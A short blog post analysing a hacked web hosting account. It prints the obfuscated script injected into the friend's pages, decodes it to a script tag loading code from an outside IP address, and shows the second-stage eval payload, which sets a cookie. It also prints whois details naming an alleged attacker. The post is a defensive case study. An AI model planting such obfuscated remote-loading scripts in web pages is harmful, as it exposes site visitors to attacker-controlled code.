Uh ohz you got haxored!

So a friend came to me today with a problem he was having and wasn’t sure what to do about…

Almost EVERY page on his webserver was going to a blank white page, or a page that was NOT what was intended to be viewed.

After looking into things, I realized we may have some foul play on our hands!

So somehow, this line of code was being inserted into almost every page on his entire hosting account.

<script language=javascript><!--
document.write(unescape('%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78
HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl
6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E').replace(/Cl6|HY8|zAn|Sn|
rL|Vh|GX/g,""));--></script>

Hmmmmmmmmmmmmm…..

My first clue was that this is using the javascript function unescape, which decodes an encoded string of text.

If you take the code and run it through a URL encoder, we end up with this:

<script language=javascript><!--  document.write(unescape('<GXscrLrGXirLpt VhsrcrL=Sn/HY8/78HY8.GX1GX1Cl60.Cl61Cl67Cl65Cl6.24Vh9zAn/Cl6jquVheHY8rrLyCl6.jSns>GX</GXszAnczAnrHY8iprLtzAn>').replace(/Cl6|HY8
|zAn|Sn|rL|Vh|GX/g,""));  --></script>

Next you can see at the end they are using javascript’s replace method which does just what it says, replaces characters with other characters.  With this particular piece of code it is replacing Cl6, HY8, zAn, Sn, rL, Vh, and GX with nothing, essentially just removing the characters.

Once you remove those characters you end up with:

<script src=//78.110.175.249/jquery.js></script>

Doing a whois on that ip reveals:

person:         Alexander A Solovyov
address:        LIMT Group Ltd.
address:        Karpinskogo 97a
address:        Moscow
address:        111423
address:        Russian Federation
phone:          +7 342 2763167
e-mail:         [email protected]
e-mail:         [email protected]
e-mail:         [email protected]

Sooooo it looks as if Mr. Solovyov has been inserting this piece of code into my friends page.  Doing a simple google search for 78.110.175.249 or Alexander A Solovyov reveals that this guy enjoys doing this sort of thing.

Well if you go to 78.110.175.249/jquery.js you will see that it APPEARS to be a jquery file… HOWEVER…this is NOT what it is.

There is actually a hidden payload inside the jquery library he included which pulls in MORE escaped code from:

http://78.110.175.249/cp/?N

which looks like this:

_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('~/`/~%4A~%75@%73t %66!u#c%6B%20@%6F@f~f%2E%2E%2E!?%3Cd@i#%76 %73$%74@%79%6C$e=#%64%69s%70`l%61y!:`%6E#o%6Ee~%3E|\n`va#r# t@%3Dn~e%77 @%44a@t%65|(%312!3%37|0`1%3759!2#0`%30$0`%29;#d$%6F`%63u`%6D!e|n|%74.~c!%6F%6F%6B%69e%3D%22h%67f%74=%31;` |e|xpi%72%65s~%3D"%2B~t.%74%6F!G~%4D~%54@%53%74r$i#%6E$g!%28)~+#%22`; ~pa%74|%68=/@%22@%3B\n@%2F%2F$%3C%2F`d|%69v%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));

If we un-obfuscate this code we end up with:

//Just fuck off...<div style=display:none>
var t=new Date(1229972812000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>

Which simply says “Just fuck off…” and then sets a cookie.

This luckily was not doing anything malicious, but COULD in the future (or could have in the past).  He can change any of the code on his webserver to do whatever he wants…whenever he wants.

After digging a bit more, I realized that my friend was infected with a trojan on his personal computer, and the attacker had most likely obtained his webserver account login and accessed it that way.

I figured I would post this little “attack case study” to give anyone interested some insight on a simple attack.  The best way to learn how to prevent these things is to be aware of them.

If you have ever been “hacked” or had your system exploited, leave a comment and let me know what you did to fix the situation, I’m curious to hear if many others have fallen prey like my friend did!